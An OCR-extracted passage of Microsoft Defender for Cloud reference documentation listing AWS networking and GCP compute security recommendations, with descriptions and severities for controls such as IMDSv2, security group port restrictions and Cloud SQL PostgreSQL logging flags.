maintenance. Ideally this is an automated process. 


AWS Networking recommendations 


There are 36 AWS recommendations in this category. 


Recommendation 


Description 


Severity 


High 


High 


Medium 


Medium 


Severity 


Recommendation 


Amazon EC2 
should be 
configured to use 
VPC endpoints £ 


Amazon ECS 
services should 
not have public IP 
addresses 
assigned to them 
automatically 4 


Amazon EMR 
cluster master 
nodes should not 
have public IP 
addresses E 


Amazon Redshift 
clusters should 
use enhanced VPC 
routing £ 


Application Load 
Balancer should 
be configured to 
redirect all HTTP 
requests to 
HTTPS Z 


Description 


This control checks whether a service endpoint for Amazon EC2 is 
created for each VPC. The control fails if a VPC does not have a 
VPC endpoint created for the Amazon EC2 service. 

To improve the security posture of your VPC, you can configure 
Amazon EC2 to use an interface VPC endpoint. Interface 
endpoints are powered by AWS PrivateLink, a technology that 
enables you to access Amazon EC2 API operations privately. It 
restricts all network traffic between your VPC and Amazon EC2 to 
the Amazon network. Because endpoints are supported within 
the same Region only, you cannot create an endpoint between a 
VPC and a service in a different Region. This prevents unintended 
Amazon EC2 API calls to other Regions. 

To learn more about creating VPC endpoints for Amazon EC2, 
see Amazon EC2 and interface VPC endpoints” in the Amazon 
EC2 User Guide for Linux Instances. 


A public IP address is an IP address that is reachable from the 
internet. 

If you launch your Amazon ECS instances with a public IP 
address, then your Amazon ECS instances are reachable from the 
internet. 

Amazon ECS services should not be publicly accessible, as this 
may allow unintended access to your container application 
servers. 


This control checks whether master nodes on Amazon EMR 
clusters have public IP addresses. 

The control fails if the master node has public IP addresses that 
are associated with any of its instances. Public IP addresses are 
designated in the Publiclp field of the Networkinterfaces 
configuration for the instance. 

This control only checks Amazon EMR clusters that are in a 
RUNNING or WAITING state. 


This control checks whether an Amazon Redshift cluster has 
EnhancedVpcRouting enabled. 

Enhanced VPC routing forces all COPY and UNLOAD traffic 
between the cluster and data repositories to go through your 
VPC. You can then use VPC features such as security groups and 
network access control lists to secure network traffic. You can 
also use VPC Flow Logs to monitor network traffic. 


To enforce encryption in transit, you should use redirect actions 
with Application Load Balancers to redirect client HTTP requests 
to an HTTPS request on port 443. 


Severity 


Medium 


High 


High 


High 


Medium 


Recommendation 


Application load 
balancers should 
be configured to 
drop HTTP 
headers z 


Configure Lambda 
functions to a 
VPC 


EC2 instances 
should not have a 
public IP 

address č 


EC2 instances 
should not use 
multiple ENIs Z 


Description 


This control evaluates AWS Application Load Balancers (ALB) to 
ensure they are configured to drop invalid HTTP headers. The 
control fails if the value of 
routing.http.drop_invalid_header_fields.enabled is set to false. 


By default, ALBs are not configured to drop invalid HTTP header 
values. Removing these header values prevents HTTP desync 
attacks. 


This control checks whether a Lambda function is in a VPC. It 
does not evaluate the VPC subnet routing configuration to 
determine public reachability. 

Note that if Lambda@Edge is found in the account, then this 
control generates failed findings. To prevent these findings, you 
can disable this control. 


This control checks whether EC2 instances have a public IP 
address. The control fails if the "publiclp" field is present in the 
EC2 instance configuration item. This control applies to IPv4 
addresses only. 

A public IPv4 address is an IP address that is reachable from the 
internet. If you launch your instance with a public IP address, 
then your EC2 instance is reachable from the internet. A private 
IPv4 address is an IP address that is not reachable from the 
internet. You can use private IPv4 addresses for communication 
between EC2 instances in the same VPC or in your connected 
private network. 

IPv6 addresses are globally unique, and therefore are reachable 
from the internet. However, by default all subnets have the IPv6 
addressing attribute set to false. For more information about 
IPv6, see IP addressing in your VPC & in the Amazon VPC User 
Guide. 

If you have a legitimate use case to maintain EC2 instances with 
public IP addresses, then you can suppress the findings from this 
control. For more information about front-end architecture 
options, see the AWS Architecture Blog £ or the This Is My 
Architecture series E, 


This control checks whether an EC2 instance uses multiple Elastic 
Network Interfaces (ENIs) or Elastic Fabric Adapters (EFAs).This 
control passes if a single network adapter is used. The control 
includes an optional parameter list to identify the allowed ENIs. 
Multiple ENIs can cause dual-homed instances, meaning 
instances that have multiple subnets. This can add network 
security complexity and introduce unintended network paths and 
access. 


Severity 


Medium 


Low 


High 


Low 


Recommendation 


EC2 instances 
should use 
IMDSv2 7 


EC2 subnets 
should not 
automatically 
assign public IP 
addresses č 


Ensure a log 
metric filter and 
alarm exist for 
AWS Config 
configuration 
changes 7 


Description 


This control checks whether your EC2 instance metadata version 
is configured with Instance Metadata Service Version 2 (IMDSv2). 
The control passes if "HttpTokens" is set to "required" for 
IMDSv2. The control fails if "HttpTokens" is set to "optional". 

You use instance metadata to configure or manage the running 
instance. The IMDS provides access to temporary, frequently 
rotated credentials. These credentials remove the need to hard 
code or distribute sensitive credentials to instances manually or 
programmatically. The IMDS is attached locally to every EC2 
instance. It runs on a special ‘link local’ IP address of 
169.254.169.254. This IP address is only accessible by software 
that runs on the instance. 

Version 2 of the IMDS adds new protections for the following 
types of vulnerabilities. These vulnerabilities could be used to try 
to access the IMDS. 

* Open website application firewalls 

* Open reverse proxies 

* Server-side request forgery (SSRF) vulnerabilities 

* Open Layer 3 firewalls and network address translation (NAT) 
Security Hub recommends that you configure your EC2 instances 
with IMDSv2. 


This control checks whether the assignment of public IPs in 
Amazon Virtual Private Cloud (Amazon VPC) subnets have 
“MapPubliclpOnLaunch" set to "FALSE". The control passes if the 
flag is set to "FALSE". 

All subnets have an attribute that determines whether a network 
interface created in the subnet automatically receives a public 
IPv4 address. Instances that are launched into subnets that have 
this attribute enabled have a public IP address assigned to their 
primary network interface. 


Real-time monitoring of API calls can be achieved by directing 
CloudTrail Logs to CloudWatch Logs and establishing 
corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 
for detecting changes to CloudTrail's configurations. 

Monitoring changes to AWS Config configuration will help 
ensure sustained visibility of configuration items within the AWS 
account. 


Severity 


High 


Medium 


Low 


Recommendation 


Ensure a log 
metric filter and 
alarm exist for 
AWS Management 
Console 
authentication 
failures Z 


Ensure a log 
metric filter and 
alarm exist for 
changes to 
Network Access 
Control Lists 
(NACL) & 


Ensure a log 
metric filter and 
alarm exist for 
changes to 
network 
gateways E 


Ensure a log 
metric filter and 
alarm exist for 
CloudtTrail 
configuration 
changes E 


Ensure a log 
metric filter and 
alarm exist for 
disabling or 
scheduled 
deletion of 
customer created 
CMKs Z 


Description 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 

for failed console authentication attempts. 

Monitoring failed console logins may decrease lead time to 

detect an attempt to brute force a credential, which may provide 

an indicator, such as source IP, that can be used in other event 


correlation. 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. NACLs are used as a 

stateless packet filter to control ingress and egress traffic for 

subnets within a VPC. 

It is recommended that a metric filter and alarm be established 

for changes made to NACLs. 

Monitoring changes to NACLs will help ensure that AWS 


resources and services are not unintentionally exposed. 


Real-time monitoring of API calls can be achieved by directing Low 
CloudtTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. Network gateways are 

required to send/receive traffic to a destination outside of a VPC. 

It is recommended that a metric filter and alarm be established 

for changes to network gateways. 

Monitoring changes to network gateways will help ensure that all 
ingress/egress traffic traverses the VPC border via a controlled 


path. 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 


for detecting changes to CloudTrail's configurations. 


Monitoring changes to CloudTrail's configuration will help ensure 
sustained visibility to activities performed in the AWS account. 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 

for customer created CMKs which have changed state to disabled 

or scheduled deletion. 

Data encrypted with disabled or deleted keys will no longer be 


accessible. 


Severity 


Recommendation 


Ensure a log 
metric filter and 
alarm exist for 
IAM policy 
changes E 


Ensure a log 
metric filter and 
alarm exist for 
Management 
Console sign-in 
without MFA 


Ensure a log 
metric filter and 
alarm exist for 
route table 
changes E 


Ensure a log 
metric filter and 
alarm exist for S3 
bucket policy 
changes E 


Ensure a log 
metric filter and 
alarm exist for 
security group 
changes E 


Description 


Real-time monitoring of API calls can be achieved by directing 
CloudTrail Logs to CloudWatch Logs and establishing 
corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 
changes made to Identity and Access Management (IAM) 
policies. 

Monitoring changes to IAM policies will help ensure 
authentication and authorization controls remain intact. 


Real-time monitoring of API calls can be achieved by directing 
CloudTrail Logs to CloudWatch Logs and establishing 
corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 
for console logins that are not protected by multi-factor 
authentication (MFA). 

Monitoring for single-factor console logins will increase visibility 
into accounts that are not protected by MFA. 


Real-time monitoring of API calls can be achieved by directing 
CloudTrail Logs to CloudWatch Logs and establishing 
corresponding metric filters and alarms. Routing tables are used 
to route network traffic between subnets and to network 
gateways. 

It is recommended that a metric filter and alarm be established 
for changes to route tables. 

Monitoring changes to route tables will help ensure that all VPC 
traffic flows through an expected path. 


Real-time monitoring of API calls can be achieved by directing 
CloudTrail Logs to CloudWatch Logs and establishing 
corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 
for changes to S3 bucket policies. 

Monitoring changes to S3 bucket policies may reduce time to 
detect and correct permissive policies on sensitive S3 buckets. 


Real-time monitoring of API calls can be achieved by directing 
CloudtTrail Logs to CloudWatch Logs and establishing 
corresponding metric filters and alarms. Security Groups are a 
stateful packet filter that controls ingress and egress traffic within 
a VPC. 

It is recommended that a metric filter and alarm be established 
changes to Security Groups. 

Monitoring changes to security group will help ensure that 
resources and services are not unintentionally exposed. 


Severity 


Low 


Low 


Low 


Low 


Low 


Recommendation 


Ensure a log 
metric filter and 
alarm exist for 
unauthorized API 
calls Z 


Ensure a log 
metric filter and 
alarm exist for 
usage of 'root' 
account E 


Ensure a log 
metric filter and 
alarm exist for 
VPC changes £ 


Ensure no security 
groups allow 
ingress from 
0.0.0.0/0 to port 
3389 7 


Management 
ports of EC2 
instances should 
be protected with 
just-in-time 
network access 
control 4 


Description 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 

for unauthorized API calls. 

Monitoring unauthorized API calls will help reveal application 


errors and may reduce time to detect malicious activity. 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. 

It is recommended that a metric filter and alarm be established 


for root login attempts. 


Monitoring for root account logins will provide visibility into the 
use of a fully privileged account and an opportunity to reduce 
the use of it. 


Real-time monitoring of API calls can be achieved by directing Low 
CloudTrail Logs to CloudWatch Logs and establishing 

corresponding metric filters and alarms. 

It is possible to have more than 1 VPC within an account, in 

addition it is also possible to create a peer connection between 2 

VPCs enabling network traffic to route between VPCs. It is 
recommended that a metric filter and alarm be established for 

changes made to VPCs. 

Monitoring changes to IAM policies will help ensure 


authentication and authorization controls remain intact. 


Security groups provide stateful filtering of ingress/egress 
network traffic to AWS resources. It is recommended that no 


High 


security group allows unrestricted ingress access to port 3389. 
Removing unfettered connectivity to remote console services, 
such as RDP, reduces a server's exposure to risk. 


Microsoft Defender for Cloud has identified some overly- High 
permissive inbound rules for management ports in your network. 
Enable just-in-time access control to protect your Instances from 


internet-based brute-force attacks. Learn more. 


Severity 


Recommendation 


RDS databases 
and clusters 
should not use a 
database engine 
default port? 


RDS instances 
should be 
deployed ina 
VPC £ 


S3 buckets should 
require requests 
to use Secure 
Socket Layer Z 


Security groups 
should not allow 
ingress from 
0.0.0.0/0 to port 
228 


Description 


This control checks whether the RDS cluster or instance uses a 
port other than the default port of the database engine. 

If you use a known port to deploy an RDS cluster or instance, an 
attacker can guess information about the cluster or instance. 
The attacker can use this information in conjunction with other 
information to connect to an RDS cluster or instance or gain 
additional information about your application. 

When you change the port, you must also update the existing 
connection strings that were used to connect to the old port. 
You should also check the security group of the DB instance to 
ensure that it includes an ingress rule that allows connectivity on 
the new port. 


VPCs provide a number of network controls to secure access to 
RDS resources. 

These controls include VPC Endpoints, network ACLs, and 
security groups. 

To take advantage of these controls, we recommend that you 
move EC2-Classic RDS instances to EC2-VPC. 


We recommend to require requests to use Secure Socket Layer 
(SSL) on all Amazon S3 bucket. 


S3 buckets should have policies that require all requests ('Action: 


S3:*') to only accept transmission of data over HTTPS in the S3 
resource policy, indicated by the condition key 
'aws:SecureTransport'. 


To reduce the server's exposure, it is recommended not to allow 
unrestricted ingress access to port '22'. 


Severity 


Low 


Low 


Medium 


High 


Recommendation 


Security groups 
should not allow 
unrestricted 
access to ports 
with high risk Z 


Description Severity 


This control checks whether unrestricted incoming traffic for the Medium 
security groups is accessible to the specified ports that have the 
highest risk. This control passes when none of the rules in a 
security group allow ingress traffic from 0.0.0.0/0 for those ports. 
Unrestricted access (0.0.0.0/0) increases opportunities for 
malicious activity, such as hacking, denial-of-service attacks, and 
loss of data. 

Security groups provide stateful filtering of ingress and egress 
network traffic to AWS resources. No security group should allow 
unrestricted ingress access to the following ports: 

- 3389 (RDP) 

- 20, 21 (FTP) 

- 22 (SSH) 

- 23 (Telnet) 

- 110 (POP3) 

- 143 (IMAP) 

- 3306 (mySQL) 

- 8080 (proxy) 

- 1433, 1434 (MSSQL) 

- 9200 or 9300 (Elasticsearch) 

- 5601 (Kibana) 

- 25 (SMTP) 

- 445 (CIFS) 

- 135 (RPC) 

- 4333 (ahsp) 

- 5432 (postgresql) 

- 5500 (fcp-addr-srvr1) 


Recommendation Description Severity 
Security groups This control checks whether the security groups that are in use High 
should only allow allow unrestricted incoming traffic. Optionally the rule checks 
unrestricted whether the port numbers are listed in the "authorizedTcpPorts" 
incoming traffic parameter. 
for authorized - If the security group rule port number allows unrestricted 
ports Z incoming traffic, but the port number is specified in 
“authorizedTcpPorts", then the control passes. The default value 
for “authorizedTcpPorts" is 80, 443. 
- If the security group rule port number allows unrestricted 
incoming traffic, but the port number is not specified in 
authorizedTcpPorts input parameter, then the control fails. 
- If the parameter is not used, then the control fails for any 
security group that has an unrestricted inbound rule. 
Security groups provide stateful filtering of ingress and egress 
network traffic to AWS. Security group rules should follow the 
principal of least privileged access. Unrestricted access (IP 
address with a /0 suffix) increases the opportunity for malicious 
activity such as hacking, denial-of-service attacks, and loss of 
data. 
Unless a port is specifically allowed, the port should deny 
unrestricted access. 
Unused EC2 EIPs Elastic IP addresses that are allocated to a VPC should be Low 
should be attached to Amazon EC2 instances or in-use elastic network 
removed % interfaces (ENIs). 
Unused network This control checks whether there are any unused network access Low 
access control lists control lists (ACLs). 
should be The control checks the item configuration of the resource 
removed £ "AWS::EC2::NetworkAcl" and determines the relationships of the 
network ACL. 
If the only relationship is the VPC of the network ACL, then the 
control fails. 
If other relationships are listed, then the control passes. 
VPC's default Security group should restrict all traffic to reduce resource Low 


security group 
should restricts all 
traffic’ 


exposure. 


Next steps 


For related information, see the following: 


e Connect your AWS accounts to Microsoft Defender for Cloud 


e What are security policies, initiatives, and recommendations? 


e Review your security recommendations 


Security recommendations for GCP 
resources - a reference guide 


Article e 06/27/2023 


This article lists the recommendations you might see in Microsoft Defender for Cloud if 


you've connected a GCP project from the Environment settings page. The 


recommendations shown in your environment depend on the resources you're 


protecting and your customized configuration. 


To learn about how to respond to these recommendations, see Remediate 


recommendations in Defender for Cloud. 


Your secure score is based on the number of security recommendations you've 


completed. To decide which recommendations to resolve first, look at the severity of 


each one and its potential impact on your secure score. 


GCP Compute recommendations 


There are 26 GCP recommendations in this category. 


Recommendation 


Compute Engine VMs should 
use the Container-Optimized 
OS 


Ensure ‘Block Project-wide 
SSH keys' is enabled for VM 
instances č 


Description 


This recommendation evaluates the config property of 
a node pool for the key-value pair, 'imageType': 'COS'. 


It is recommended to use Instance specific SSH key(s) 
instead of using common/shared project-wide SSH 
key(s) to access Instances. 

Project-wide SSH keys are stored in Compute/Project- 
meta-data. Project wide SSH keys can be used to login 
into all the instances within project. Using project- 
wide SSH keys eases the SSH key management but if 
compromised, poses the security risk which can 
impact all the instances within project. 

It is recommended to use Instance specific SSH keys 
which can limit the attack surface if the SSH keys are 
compromised. 


Severity 


Low 


Medium 


Recommendation Description Severity 


Ensure Compute instances To defend against against advanced threats and High 
are launched with Shielded ensure that the boot loader and firmware on your VMs 
VM enabled zZ are signed and untampered, it is recommended that 


Compute instances are launched with Shielded VM 
enabled. 

Shielded VMs are virtual machines (VMs) on Google 
Cloud Platform hardened by a set of security controls 
that help defend against rootkits and bootkits. 
Shielded VM offers verifiable integrity of your 
Compute Engine VM instances, so you can be 
confident your instances haven't been compromised 
by boot- or kernel-level malware or rootkits. 
Shielded VM's verifiable integrity is achieved through 
the use of Secure Boot, virtual trusted platform 
module (vTPM)-enabled Measured Boot, and integrity 
monitoring. 

Shielded VM instances run firmware which is signed 
and verified using Google's Certificate Authority, 
ensuring that the instance's firmware is unmodified 
and establishing the root of trust for Secure Boot. 
Integrity monitoring helps you understand and make 
decisions about the state of your VM instances and 
the Shielded VM vTPM enables Measured Boot by 
performing the measurements needed to create a 
known good boot baseline, called the integrity policy 
baseline. 

The integrity policy baseline is used for comparison 
with measurements from subsequent VM boots to 
determine if anything has changed. 

Secure Boot helps ensure that the system only runs 
authentic software by verifying the digital signature of 
all boot components, and halting the boot process if 
signature verification fails. 


Recommendation 


Ensure ‘Enable connecting to 
serial ports’ is not enabled 
for VM Instance 6 


Ensure ‘log_duration’ 
database flag for Cloud SQL 
PostgreSQL instance is set to 
‘on’? 


Description 


Interacting with a serial port is often referred to as the 
serial console, which is similar to using a terminal 
window, in that input and output is entirely in text 
mode and there is no graphical interface or mouse 
support. 

If you enable the interactive serial console on an 
instance, clients can attempt to connect to that 
instance from any IP address. Therefore interactive 
serial console support should be disabled. 

A virtual machine instance has four virtual serial ports. 
Interacting with a serial port is similar to using a 
terminal window, in that input and output is entirely in 
text mode and there is no graphical interface or 
mouse support. 

The instance's operating system, BIOS, and other 
system-level entities often write output to the serial 
ports, and can accept input such as commands or 
answers to prompts. 

Typically, these system-level entities use the first serial 
port (port 1) and serial port 1 is often referred to as 
the serial console. 

The interactive serial console does not support IP- 
based access restrictions such as IP whitelists. If you 
enable the interactive serial console on an instance, 
clients can attempt to connect to that instance from 
any IP address. 

This allows anybody to connect to that instance if they 
know the correct SSH key, username, project ID, zone, 
and instance name. 

Therefore interactive serial console support should be 
disabled. 


Enabling the log_hostname setting causes the 
duration of each completed statement to be logged. 
This does not logs the text of the query and thus 
behaves different from the 
log_min_duration_statement flag. 

This parameter cannot be changed after session start. 
Monitoring the time taken to execute the queries can 
be crucial in identifying any resource hogging queries 
and assessing the performance of the server. 

Further steps such as load balancing and use of 
optimized queries can be taken to ensure the 
performance and stability of the server. 

This recommendation is applicable to PostgreSQL 
database instances. 


Severity 


Medium 


Low 


Recommendation 


Ensure ‘log_executor_stats' 
database flag for Cloud SQL 
PostgreSQL instance is set to 
‘off 2 


Ensure 
‘log_min_error_statement' 
database flag for Cloud SQL 
PostgreSQL instance is set to 
‘Error’ or stricter č 


Description 


The PostgreSQL executor is responsible to execute the 
plan handed over by the PostgreSQL planner. 

The executor processes the plan recursively to extract 
the required set of rows. 

The "log_executor_stats" flag controls the inclusion of 
PostgreSQL executor performance statistics in the 
PostgreSQL logs for each query. 

The “log_executor_stats" flag enables a crude profiling 
method for logging PostgreSQL executor performance 
statistics which even though can be useful for 
troubleshooting, it may increase the amount of logs 
significantly and have performance overhead. 

This recommendation is applicable to PostgreSQL 
database instances. 


The "log_min_error_statement" flag defines the 
minimum message severity level that are considered 
as an error statement. 

Messages for error statements are logged with the 
SQL statement. 

Valid values include "DEBUG5", "DEBUG4", "DEBUG3", 
"DEBUG2", "DEBUG1", "INFO", "NOTICE", "WARNING", 
"ERROR", "LOG", "FATAL", and "PANIC". 

Each severity level includes the subsequent levels 
mentioned above. 

Ensure a value of ERROR or stricter is set. 

Auditing helps in troubleshooting operational 
problems and also permits forensic analysis. 

If "log_min_error_statement" is not set to the correct 
value, messages may not be classified as error 
messages appropriately. 

Considering general log messages as error messages 
would make is difficult to find actual errors and 
considering only stricter severity levels as error 
messages may skip actual errors to log their SQL 
statements. 

The "log_min_error_statement" flag should be set to 
"ERROR" or stricter. 

This recommendation is applicable to PostgreSQL 
database instances. 


Severity 


Low 


Low 


Recommendation 


Ensure ‘log_parser_stats' 
database flag for Cloud SQL 
PostgreSQL instance is set to 
‘off 2 


Ensure ‘log_planner_stats' 
database flag for Cloud SQL 
PostgreSQL instance is set to 
‘off 2 


Ensure ‘log_statement_stats' 
database flag for Cloud SQL 
PostgreSQL instance is set to 
'off' Z 


Description 


The PostgreSQL planner/optimizer is responsible to 
parse and verify the syntax of each query received by 
the server. 

If the syntax is correct a "parse tree" is built up else an 
error is generated. 

The "log_parser_stats" flag controls the inclusion of 
parser performance statistics in the PostgreSQL logs 
for each query. 

The "log_parser_stats" flag enables a crude profiling 
method for logging parser performance statistics 
which even though can be useful for troubleshooting, 
it may increase the amount of logs significantly and 
have performance overhead. 

This recommendation is applicable to PostgreSQL 
database instances. 


The same SQL query can be excuted in multiple ways 
and still produce different results. 

The PostgreSQL planner/optimizer is responsible to 
create an optimal execution plan for each query. 

The "log_planner_stats" flag controls the inclusion of 
PostgreSQL planner performance statistics in the 
PostgreSQL logs for each query. 

The "log_planner_stats" flag enables a crude profiling 
method for logging PostgreSQL planner performance 
statistics which even though can be useful for 
troubleshooting, it may increase the amount of logs 
significantly and have performance overhead. 

This recommendation is applicable to PostgreSQL 
database instances. 


The "log_statement_stats” flag controls the inclusion 
of end to end performance statistics of a SQL query in 
the PostgreSQL logs for each query. 

This cannot be enabled with other module statistics 
("log_parser_stats", "log_planner_stats", 
“log_executor_stats"). 

The "log_statement_stats" flag enables a crude 
profiling method for logging end to end performance 
statistics of a SQL query. 

This can be useful for troubleshooting but may 
increase the amount of logs significantly and have 
performance overhead. 

This recommendation is applicable to PostgreSQL 
database instances. 


Severity 


Low 


Low 


Low 


Recommendation 


Ensure that Compute 
instances do not have public 
IP addresses 7 


Ensure that instances are not 
configured to use the default 
service account E 


Description 


Compute instances should not be configured to have 
external IP addresses. 

To reduce your attack surface, Compute instances 
should not have public IP addresses. Instead, instances 
should be configured behind load balancers, to 
minimize the instance's exposure to the internet. 
Instances created by GKE should be excluded because 
some of them have external IP addresses and cannot 
be changed by editing the instance settings. 

These VMs have names that start with "gke-" and are 
labeled "goog-gke-node". 


It is recommended to configure your instance to not 
use the default Compute Engine service account 
because it has the Editor role on the project. 

The default Compute Engine service account has the 
Editor role on the project, which allows read and write 
access to most Google Cloud Services. 

To defend against privilege escalations if your VM is 
compromised and prevent an attacker from gaining 
access to all of your project, it is recommended to not 
use the default Compute Engine service account. 
Instead, you should create a new service account and 
assigning only the permissions needed by your 
instance. 

The default Compute Engine service account is named 
[PROJECT_NUMBER] - 
compute@developer.gserviceaccount.com. 

VMs created by GKE should be excluded. These VMs 
have names that start with "gke-" and are labeled 
"“goog-gke-node". 


Severity 


High 


High 


Recommendation 


Ensure that instances are not 
configured to use the default 
service account with full 
access to all Cloud APIs £ 


Description 


To support principle of least privileges and prevent 
potential privilege escalation it is recommended that 
instances are not assigned to default service account 
“Compute Engine default service account" with Scope 
“Allow full access to all Cloud APIs". 

Along with ability to optionally create, manage and 
use user managed custom service accounts, Google 
Compute Engine provides default service account 
“Compute Engine default service account" for an 
instances to access necessary cloud services. 

"Project Editor" role is assigned to "Compute Engine 
default service account" hence, This service account 
has almost all capabilities over all cloud services 
except billing. 

However, when "Compute Engine default service 
account" assigned to an instance it can operate in 3 
scopes. 

1. Allow default access: Allows only minimum access 
required to run an Instance (Least Privileges) 2. Allow 
full access to all Cloud APIs: Allow full access to all the 
cloud APls/Services (Too much access) 3. Set access for 
each API: Allows Instance administrator to choose only 
those APIs that are needed to perform specific 
business functionality expected by instance 

When an instance is configured with "Compute Engine 
default service account" with Scope "Allow full access 
to all Cloud APIs", based on IAM roles assigned to the 
user(s) accessing Instance, 

it may allow user to perform cloud operations/API 
calls that user is not supposed to perform leading to 
successful privilege escalation. 

VMs created by GKE should be excluded. These VMs 
have names that start with "gke-" and are labeled 
“goog-gke-node". 


Severity 


Medium 


Recommendation 


Ensure that IP forwarding is 
not enabled on Instances E 


Ensure that the 
‘log_checkpoints' database 
flag for Cloud SQL 
PostgreSQL instance is set to 
‘on’? 


Description 


Compute Engine instance cannot forward a packet 
unless the source IP address of the packet matches the 
IP address of the instance. Similarly, GCP won't deliver 
a packet whose destination IP address is different than 
the IP address of the instance receiving the packet. 
However, both capabilities are required if you want to 
use instances to help route packets. 

Forwarding of data packets should be disabled to 
prevent data loss or information disclosure. 

Compute Engine instance cannot forward a packet 
unless the source IP address of the packet matches the 
IP address of the instance. Similarly, GCP won't deliver 
a packet whose destination IP address is different than 
the IP address of the instance receiving the packet. 
However, both capabilities are required if you want to 
use instances to help route packets. To enable this 
source and destination IP check, disable the 
canlpForward field, which allows an instance to send 
and receive packets with non-matching destination or 
source IPs. 


Ensure that the log_checkpoints database flag for the 
Cloud SQL PostgreSQL instance is set to on. 

Enabling log_checkpoints causes checkpoints and 
restart points to be logged in the server log. Some 
statistics are included in the log messages, including 
the number of buffers written and the time spent 
writing them. 

This parameter can only be set in the postgresql.conf 
file or on the server command line. This 
recommendation is applicable to PostgreSQL database 
instances. 


Severity 


Medium 


Low 


Recommendation 


Ensure that the 
‘log_lock_waits' database flag 
for Cloud SQL PostgreSQL 
instance is set to ‘on’? 


Ensure that the 


‘log_min_duration_statement' 


database flag for Cloud SQL 
PostgreSQL instance is set to 


bed 7 


Description 


Enabling the "log_lock_waits" flag for a PostgreSQL 
instance creates a log for any session waits that take 
longer than the alloted "deadlock_timeout" time to 
acquire a lock. 

The deadlock timeout defines the time to wait on a 
lock before checking for any conditions. Frequent run 
overs on deadlock timeout can be an indication of an 
underlying issue. 

Logging such waits on locks by enabling the 
log_lock_waits flag can be used to identify poor 
performance due to locking delays or if a specially- 
crafted SQL is attempting to starve resources through 
holding locks for excessive amounts of time. 

This recommendation is applicable to PostgreSQL 
database instances. 


The "log_min_duration_statement" flag defines the 
minimum amount of execution time of a statement in 
milliseconds where the total duration of the statement 
is logged. Ensure that "log_min_duration_statement” is 
disabled, i.e., a value of -1 is set. 

Logging SQL statements may include sensitive 
information that should not be recorded in logs. This 
recommendation is applicable to PostgreSQL database 
instances. 


Severity 


Low 


Low 


Recommendation 


Ensure that the 
‘log_min_messages' database 
flag for Cloud SQL 
PostgreSQL instance is set 
appropriately Z 


Ensure that the 
‘log_temp_files' database flag 
for Cloud SQL PostgreSQL 
instance is set to DS 


Description 


The "log_min_error_statement" flag defines the 
minimum message severity level that is considered as 
an error statement. 

Messages for error statements are logged with the 
SQL statement. 

Valid values include "DEBUG5", "DEBUG4", "DEBUG3", 
"DEBUG2", "DEBUG1", "INFO", "NOTICE", "WARNING", 
"ERROR", "LOG", "FATAL", and "PANIC". 

Each severity level includes the subsequent levels 
mentioned above. 

Note: To effectively turn off logging failing statements, 
set this parameter to PANIC. 

ERROR is considered the best practice setting. 
Changes should only be made in accordance with the 
organization's logging policy. 

Auditing helps in troubleshooting operational 
problems and also permits forensic analysis. 

If "log_min_error_statement" is not set to the correct 
value, messages may not be classified as error 
messages appropriately. 

Considering general log messages as error messages 
would make it difficult to find actual errors, while 
considering only stricter severity levels as error 
messages may skip actual errors to log their SQL 
statements. 

The "log_min_error_statement" flag should be set in 
accordance with the organization's logging policy. 
This recommendation is applicable to PostgreSQL 
database instances. 


PostgreSQL can create a temporary file for actions 
such as sorting, hashing and temporary query results 
when these operations exceed "work_mem". 

The "log_temp_files” flag controls logging names and 
the file size when it is deleted. 

Configuring "log_temp_files" to O causes all temporary 
file information to be logged, while positive values log 
only files whose size is greater than or equal to the 
specified number of kilobytes. 

A value of "-1" disables temporary file information 
logging. 

If all temporary files are not logged, it may be more 
difficult to identify potential performance issues that 
may be due to either poor application coding or 
deliberate resource starvation attempts. 


Severity 


Low 


Low 


Recommendation 


Ensure VM disks for critical 
VMs are encrypted with 
Customer-Supplied 
Encryption Key? 


GCP projects should have 
Azure Arc auto provisioning 
enabled 7 


Description 


Customer-Supplied Encryption Keys (CSEK) are a 
feature in Google Cloud Storage and Google Compute 
Engine. 

If you supply your own encryption keys, Google uses 
your key to protect the Google-generated keys used 
to encrypt and decrypt your data. 

By default, Google Compute Engine encrypts all data 
at rest. 

Compute Engine handles and manages this encryption 
for you without any additional actions on your part. 
However, if you wanted to control and manage this 
encryption yourself, you can provide your own 
encryption keys. 

By default, Google Compute Engine encrypts all data 
at rest. Compute Engine handles and manages this 
encryption for you without any additional actions on 
your part. 

However, if you wanted to control and manage this 
encryption yourself, you can provide your own 
encryption keys. 

If you provide your own encryption keys, Compute 
Engine uses your key to protect the Google-generated 
keys used to encrypt and decrypt your data. 

Only users who can provide the correct key can use 
resources protected by a customer-supplied 
encryption key. 

Google does not store your keys on its servers and 
cannot access your protected data unless you provide 
the key. 

This also means that if you forget or lose your key, 
there is no way for Google to recover the key or to 
recover any data encrypted with the lost key. 

At least business critical VMs should have VM disks 
encrypted with CSEK. 


For full visibility of the security content from Microsoft 
Defender for servers, GCP VM instances should be 
connected to Azure Arc. To ensure that all eligible VM 
instances automatically receive Azure Arc, enable 
auto-provisioning from Defender for Cloud at the GCP 
project level. Learn more about Azure Arc, and 
Microsoft Defender for Servers. 


Severity 


Medium 


High 


should have 
Microsoft 
Defender's 
extension for 
Azure Arc 
installed £ 


Recommendation Description Severity 
GCP VM instances should be Connect your GCP Virtual Machines to Azure Arc in High 
connected to Azure Arc? order to have full visibility to Microsoft Defender for 
Servers security content. Learn more about Azure Arc, 
and about Microsoft Defender for Servers on hybrid- 
cloud environment. 
GCP VM instances should To receive the full Defender for Servers capabilities High 
